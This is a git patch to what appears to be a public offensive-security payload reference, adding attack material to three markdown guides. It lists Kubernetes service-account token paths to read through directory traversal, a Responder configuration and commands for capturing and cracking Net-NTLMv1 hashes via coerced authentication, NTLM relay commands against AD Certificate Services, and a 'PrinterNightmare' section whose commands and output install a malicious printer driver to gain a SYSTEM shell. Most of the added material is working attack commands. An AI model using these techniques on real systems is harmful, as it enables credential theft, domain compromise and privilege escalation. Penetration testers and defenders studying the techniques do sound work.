From c8076e99c979cca0496d9585169d24787d051618 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Mon, 6 Sep 2021 20:58:44 +0200 Subject: [PATCH] Net-NTLMv1 + DriverPrinter --- Directory Traversal/README.md | 3 ++ .../Active Directory Attack.md | 43 +++++++++++++++++-- .../Windows - Privilege Escalation.md | 26 ++++++++++- 3 files changed, 67 insertions(+), 5 deletions(-) diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index f6ef98f..e459021 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -125,6 +125,9 @@ To bypass this behaviour just add forward slashes in front of the url: /proc/self/cwd/main.py /home/$USER/.bash_history /home/$USER/.ssh/id_rsa +/run/secrets/kubernetes.io/serviceaccount/token +/run/secrets/kubernetes.io/serviceaccount/namespace +/run/secrets/kubernetes.io/serviceaccount/certificate /var/run/secrets/kubernetes.io/serviceaccount /var/lib/mlocate/mlocate.db /var/lib/mlocate.db diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b3e3f24..518be96 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -58,7 +58,8 @@ - [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) - [Using impacket](#using-impacket) - [Using Rubeus](#using-rubeus) - - [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes) + - [Capturing and cracking Net-NTLMv1/NTLMv1 hashes](#capturing-and-cracking-net-ntlmv1ntlmv1-hashes) + - [Capturing and cracking Net-NTLMv2/NTLMv2 hashes](#capturing-and-cracking-net-ntlmv2ntlmv2-hashes) - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying) - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection) - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4) @@ -1665,7 +1666,39 @@ klist .\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe ``` -### Capturing and cracking NTLMv2 hashes + + +### Capturing and cracking Net-NTLMv1/NTLMv1 hashes + +> Net-NTLM (NTLMv1) hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user's NT hash. + +:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine, to get the machine account Net-NTLM v1 hash + +Requirements: +* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) + + +* Capturing using Responder: Edit the /etc/responder/Responder.conf file to include the magical **1122334455667788** challenge + ```ps1 + HTTPS = On + DNS = On + LDAP = On + ... + ; Custom challenge. + ; Use "Random" for generating a random challenge for each requests (Default) + Challenge = 1122334455667788 + ``` +* Fire Responder: `responder -I eth0 --lm` +* If you got some `NTLMv1 hashes`, you need to format then submit them on [crack.sh](https://crack.sh/netntlm/), or crack them with Hashcat/John + ```ps1 + username::hostname:response:response:challenge -> NTHASH:response + NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 + ``` + +:warning: NTLMv1 with SSP(Security Support Provider) changes the server challenge and is not quite ideal for the attack, but it can be used. + + +### Capturing and cracking Net-NTLMv2/NTLMv2 hashes If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. @@ -1680,6 +1713,7 @@ PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y ``` + ### Man-in-the-Middle attacks & relaying NTLMv1 and NTLMv2 can be relayed to connect to another machine. @@ -1921,8 +1955,9 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101 * Version 1: NTLM Relay + Rubeus + PetitPotam ```powershell impacket> python3 ntlmrelayx.py -t http:///certsrv/certfnsh.asp -smb2support --adcs - impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template workstation - # Templates: workstation, DomainController, Machine; KerberosAuthentication + impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate + # For a member server or workstation, the template would be "Computer". + # Other templates: workstation, DomainController, Machine, KerberosAuthentication # Coerce the authentication via MS-ESFRPC EfsRpcOpenFileRaw function with petitpotam # You can also use any other way to coerce the authentication like PrintSpooler via MS-RPRN diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 569cff1..52057a2 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -35,7 +35,7 @@ * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) * [EoP - Insecure GUI apps](#eop---insecure-gui-apps) * [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) -* [EoP - Printers](#eop-printers) +* [EoP - Printers](#eop---printers) * [Universal Printer](#universal-printer) * [Bring Your Own Vulnerability](#bring-your-own-vulnerability) * [EoP - Runas](#eop---runas) @@ -999,6 +999,30 @@ Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue Add-Printer -ConnectionName $fullprinterName ``` +### PrinterNightmare + +```ps1 +git clone https://github.com/Flangvik/DeployPrinterNightmare +PS C:\adversary> FakePrinter.exe 32mimispool.dll 64mimispool.dll EasySystemShell +[<3] @Flangvik - TrustedSec +[+] Copying C:\Windows\system32\mscms.dll to C:\Windows\system32\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Copying 64mimispool.dll to C:\Windows\system32\spool\drivers\x64\3\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Copying 32mimispool.dll to C:\Windows\system32\spool\drivers\W32X86\3\6cfbaf26f4c64131896df8a522546e9c.dll +[+] Adding printer driver => Generic / Text Only! +[+] Adding printer => EasySystemShell! +[+] Setting 64-bit Registry key +[+] Setting 32-bit Registry key +[+] Setting '*' Registry key +``` + +```ps1 +PS C:\target> $serverName = 'printer-installed-host' +PS C:\target> $printerName = 'EasySystemShell' +PS C:\target> $fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment]::Is64BitOperatingSystem) {'x64'} Else {'x86'}) +PS C:\target> Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue +PS C:\target> Add-Printer -ConnectionName $fullprinterName +``` + ### Bring Your Own Vulnerability Concealed Position : https://github.com/jacob-baines/concealed_position